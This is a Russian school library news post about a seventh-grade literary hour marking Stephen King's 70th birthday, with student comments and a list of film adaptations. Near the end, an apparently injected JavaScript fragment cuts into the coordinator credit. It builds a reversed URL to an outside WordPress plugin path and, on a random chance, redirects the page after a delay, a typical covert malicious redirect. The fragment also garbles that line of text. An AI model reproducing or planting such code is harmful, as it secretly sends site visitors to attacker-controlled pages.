logo

ЛИТЕРАТУРНЫЙ ЧАС В БИБЛИОТЕКЕ, ПОСВЯЩЕННЫЙ 70-ЛЕТИЮ СО ДНЯ РОЖДЕНИЯ АМЕРИКАНСКОГО ПИСАТЕЛЯ СТИВЕНА ЭДВИНА КИНГА

(англ. Stephen Edwin King; род. 21 сентября 1947, Портленд, Мэн, США)
«Если во всем облом, сдавайся и иди в библиотеку»
С. Кинг

28 сентября в нашу школьную библиотеку пришли ученики 7 класса, чтобы отметить юбилей замечательного американского писателя, «короля ужасов», Стивена Кинга. Студент выпускного класса MYP Иван Кардашиди подготовил интересную интерактивную презентацию о жизни и творчестве писателя, увлекательно рассказал о лучших книгах С. Кинга, показал отрывки из фильмов «Зеленая миля» и «Побег из Шоушенка». Семиклассники затаив дыхание слушали рассказ Ивана, многие не были знакомы с творчеством писателя. В конце встречи юным читателям было предложено ответить на вопросы литературной викторины. Правильные ответы были быстро найдены, все участники получили сладкие призы.
Такие встречи расширяют кругозор учащихся, формируют любознательность, эрудицию, воспитывают уважение к книге, знаниям, побуждают к чтению.
«Я узнал о Стивене Кинге в 11 лет. Решил посмотреть фильм «Зелёная миля», когда прочитал рецензию на одном из сайтов в Интернете. Фильм очень понравился, я посмотрел ещё несколько, но не все, потому что не всегда могу найти для этого время. Хочу сказать спасибо Ване Кардашиди за то, что познакомил нас с книгами «короля ужасов». Я заинтересовался первой книгой С. Кинга «Керри», которая и принесла ему популярность».
Степан Гуданов, 7 класс

«Моё знакомство с американским писателем Стивеном Кингом произошло лет в 8-9, когда я впервые посмотрел фильм «Побег из Шоушенка». Уже пересматривая фильм второй раз, я решил прочитать книгу, по которой он был снят. Потом я прочитал «Сияние» и «Оно», 1 том «Тёмной башни» (про стрелка) и не планирую останавливаться. Бывает, мы с Сашей Яковлевым обсуждаем прочитанные книги, такие встречи дают новую пищу для размышлений. Именно поэтому я с удовольствием воспользовался возможностью рассказать о легендарном писателе семиклассникам. Я был удивлён, что многие не читали Стивена Кинга и не смотрели фильмы, созданные по его произведениям. Надеюсь, мне удалось заинтересовать ребят».

Иван Кардашиди, 9 класс
Десять лучших экранизаций С. Кинга
Кэрри (1976)
Режиссер: Брайан Де Пальма
Сияние (1980)
Режиссер: Стэнли Кубрик
Кристина (1983)
Режиссер: Джон Карпентер
Останься со мной (1986)
Режиссер: Роб Райнер
Кладбище домашних животных (1989)
Режиссер: Мэри Ламберт
Мизери (1990)
Режиссер: Роб Райнер
Побег из Шоушенка (1994)
Режиссер: Фрэнк Дарабонт
Зеленая миля (1999)
Режиссер: Фрэнк Дарабонт
Тайное окно (2004)
Режиссер: Дэвид Кепп
Оно (2017)
Режиссер: Андрес Мускетти

Официальный сайт писателя (англ). http://stephenking.com/

Зав. библиотекой Симбиркина О.В.
Coordinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor С&S Golubtsova Ksenia

DSC_1132 IMG_20170928_142043 DSC_1139 DSC_1136